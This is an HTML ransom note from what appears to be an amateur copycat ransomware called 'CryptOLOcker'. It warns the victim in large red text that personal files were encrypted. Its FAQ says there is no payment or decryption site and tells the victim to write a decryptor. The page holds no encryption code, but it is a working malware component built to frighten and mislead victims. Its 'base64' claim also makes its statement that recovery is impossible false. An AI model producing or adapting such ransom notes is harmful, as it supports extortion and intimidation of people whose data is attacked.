<html>
    <head>
        <title>IMPORTANT</title>
        <style>
            .box_note {
                width: 840;
                height: 120;
                border: 1.6px solid #000000;
                text-align: left;
                text-transform: none;
                text-decoration: none;
                word-spacing:0px;
                letter-spacing: 0px;
                line-height: 1.5;
                border-radius: 5px;
                background-color: white;
                align-items: center;
                align-content: center;
                align-self: center;
            }

            .box_note2 {
                width: 840;
                height: 530;
                text-align: left;
                text-transform: none;
                text-decoration: none;
                word-spacing:0px;
                letter-spacing: 0px;
                line-height: 1.5;
                border-radius: 2px;
                background-color: rgb(255, 255, 255);
                align-items: center;
                align-content: center;
                align-self: center;
            }

            .box_note2_2 {
                width: 765;
                height: 475;
                text-align: left;
                text-transform: none;
                text-decoration: none;
                word-spacing:0px;
                letter-spacing: 0px;
                line-height: 1.5;
                border-radius: 2px;
                background-color: rgb(226, 211, 211);
                align-items: center;
                align-content: center;
                align-self: center;
            }

            .box_note3{
                width: 685;
                height: 83;
                text-align: left;
                text-transform: none;
                text-decoration: none;
                word-spacing:0px;
                letter-spacing: 0px;
                line-height: 1.5;
                border-radius: 4px;
                background-color: rgb(255, 255, 255);
                align-items: center;
                align-content: center;
                align-self: center;
            }

            .pay_recover {
                background-color: rgb(182, 230, 237);
                color: black;
                padding: 10px 309px;
                font-family: Tahoma;
                border-radius: 4px;
                border: 1.3px solid #000000;
            }

        </style>
    </head>
    <body bgcolor='#E5DEDE'>
        <center>
            <h1 style="color:red; font-size: 55; font-family: Lucida Console;">WARNING</h1>
            <h1> </h1>
            <h1 style="color:black; font-size: 24; font-family: Lucida Console;">We have been encrypted your files with CryptOLOcker virus</h1>
            <h1> </h1>
            <dir class='box_note'>
                <h3></h3>
                <h3></h3>
                <font face="Tahoma" size='2' color='black'>Your important files (including those on the Desktop, Downloads, etc): photos , videos, docments, etc. were encrypted with our CryptOLOcker.</font>
                <h1  style="color:white; font-size: 1">-</h1>
                <font face="Tahoma" size='2' color='black'>The only way to get your files back is to create decryption now. Otherwise, your files wil not decrypt.</font>
                <h1  style="color:white; font-size: 4">-</h1>
                <font face="Tahoma" color='black'size='4'>Caution</font>
                <font face="Tahoma" size='2' color='black'>: If you use Torrent Locker decryptor free not work because i use encryption new.</font>
            </dir>
            <h1  style="color:rgb(113, 217, 233); font-size: 15">-</h1>
            <a class="pay_recover" href="https://www.bleepingcomputer.com/virus-removal/torrentlocker-crypt0l0cker-ransomware-information#TorrentLocker">Click here to Saw data Torrent Locker</a>  
            <h1  style="color:rgb(113, 217, 233); font-size: 10">-</h1>
            <dir class="box_note2">
                <h1  style="color:white; font-size: 7">-</h1>
                <dir class="box_note2_2">
                    <h1  style="color:white; font-size: 5">-</h1>
                <h1 style="color:black; font-size: 20; font-family: Arial;">Frequently Asked Questions</h1>
                <dir class="box_note3">
                    <h1  style="color:white; font-size: 0">-</h1>
                    <h1 style="color: rgb(97, 172, 248); font-size: 18; font-family: Arial;">[+] What happened to my files?</h1>
                    <font face="Arial" size='3' color='black'>You are Infected torrent locker (Copycat) and files have been encrypted!</font>
                </dir>
                <font color="white" size="0"></font>
                <dir class="box_note3">
                    <h1  style="color:white; font-size: 0">-</h1>
                    <h1 style="color: rgb(97, 172, 248); font-size: 18; font-family: Arial;">[+] Where Payment Site?</h1>
                    <font face="Arial" size='3' color='black'>I not make payment site and decryption site now</font>
                </dir>
                <font color="white" size="0"></font>
                <dir class="box_note3">
                    <h1  style="color:white; font-size: 0">-</h1>
                    <h1 style="color: rgb(97, 172, 248); font-size: 18; font-family: Arial;">[+] I can recover files?</h1>
                    <font face="Arial" size='3' color='black'>Decrypt can't now because encryption with base64 and not make decryptor now</font>
                </dir>
                <font color="white" size="0"></font>
                <dir class="box_note3">
                    <h1  style="color:white; font-size: 0">-</h1>
                    <h1 style="color: rgb(97, 172, 248); font-size: 18; font-family: Arial;">[+] What should I do next?</h1>
                    <font face="Arial" size='3' color='black'>You make decryptor by you for decrypt file now good luck to make decryptor.</font>
                </dir>
                </dir>
            </dir>
        </center>
    </body>
</html>